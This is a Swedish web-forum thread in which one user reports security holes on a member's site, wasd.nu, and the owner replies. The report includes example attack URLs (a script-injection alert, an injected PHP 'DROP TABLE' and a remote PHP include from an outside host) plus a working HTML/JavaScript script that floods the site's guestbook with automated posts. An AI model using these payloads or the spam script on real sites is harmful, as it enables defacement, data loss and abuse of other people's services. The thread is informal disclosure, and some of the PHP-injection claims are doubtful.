Hoppa till innehåll

Wasd.nu


WASD

Rekommendera inlägg

Du har glömt att säkra $_GET['id'] mot SQL-injections.

 

Visar en popupruta med texten "Skadlig kod"

www.wasd.nu/profile.php?id=<script>alert("Skadlig kod")</script>

 

Raderar kolumnen MEDLEMMAR

www.wasd.nu/profile.php?id=<?php mysql_query("DROP TABLE MEDLEMMAR"); ?>

 

Eftersom denna kod inkluderas i ditt script kommer den att köras på din server

www.wasd.nu/profile.php?id=<?php include('http://woodo.zxq.net/XSS.php'); ?>

Länk till kommentar
Dela på andra sajter

  • Svar 147
  • Skapat
  • Senaste svar

Ledande medlemmar i detta ämne

Ledande medlemmar i detta ämne

Postade bilder

Skrivet (redigerat)

Tackar! Fixar det så snart som möjligt.

Nu funkar det väl inte längre? Ska bara kolla på vilka andra ställen jag inte säkrat det.

 

Kan man verkligen skicka in PHP på det viset? Texten som kommer in kommer ju ut i echo, och php som skrivits ut av echo körs inte.

Denna raden:

echo "<?php echo "hej" ?>"

Skriver ut: <?php echo "hej" ?>

Inte hej

Redigerat av WASD
Länk till kommentar
Dela på andra sajter

Skrivet (redigerat)

Jag har gjort ett table som heter "test" som du får försöka ta bort, jag lyckas inte göra det på det sättet du påstår.

 

edit: "test" hette det, inte "asd" som jag skrev tidigare.

Redigerat av WASD
Länk till kommentar
Dela på andra sajter

Det här skriptet spammar din gästbok. Cirka 100 inlägg / sekund.

 

Efter 10 sekunder har skriptet postat 1000 inlägg som du blir tvungen att ta bort manuellt.

 

<html>
<head>

<script type="text/javascript">
function loadfnc() {
form = document.getElementById('sendthisform');
form.submit();
window.location.reload()
}
window.onload=loadfnc;
</script>

</head>
<body>

<iframe name="formtarget" style="display: none;"></iframe>
<form action="http://wasd.nu/gbok.php" method="post" id="sendthisform" target="formtarget">
<input type='hidden' name='fname' value='test'>
<input type='hidden' name='fmessage' value='test'>
</form>

</body>
</html>

 

Demo

Redigerat av Woodo
Länk till kommentar
Dela på andra sajter

Skrivet (redigerat)

100 per sekund är lite mycket, jag har själv programmerat bottar och 30 per sekund är mer rimligt.

Kanske bäst att fixa ett botskydd då, sätter upp det på att-göra-listan.

 

Inget händer förresten när jag trycker på din demo-länk. Bara en vit sida och inget nytt i gästboken.

Redigerat av WASD
Länk till kommentar
Dela på andra sajter

Gå med i konversationen

Du kan skriva nu och registrera dig senare. Om du har ett konto, logga in nu för att posta med ditt konto.

Gäst
Svara på det här ämnet...

×   Klistrade in som rich text.   Klistra in som vanlig text istället

  Endast 75 emojis är tillåtet.

×   Din länk har automatiskt inbäddats.   Visa som en länk istället

×   Ditt tidigare innehåll har återställts.   Rensa redigeraren

×   Du kan inte klistra in bilder direkt. Ladda upp eller infoga bilder från URL.

×
  • Skapa ny...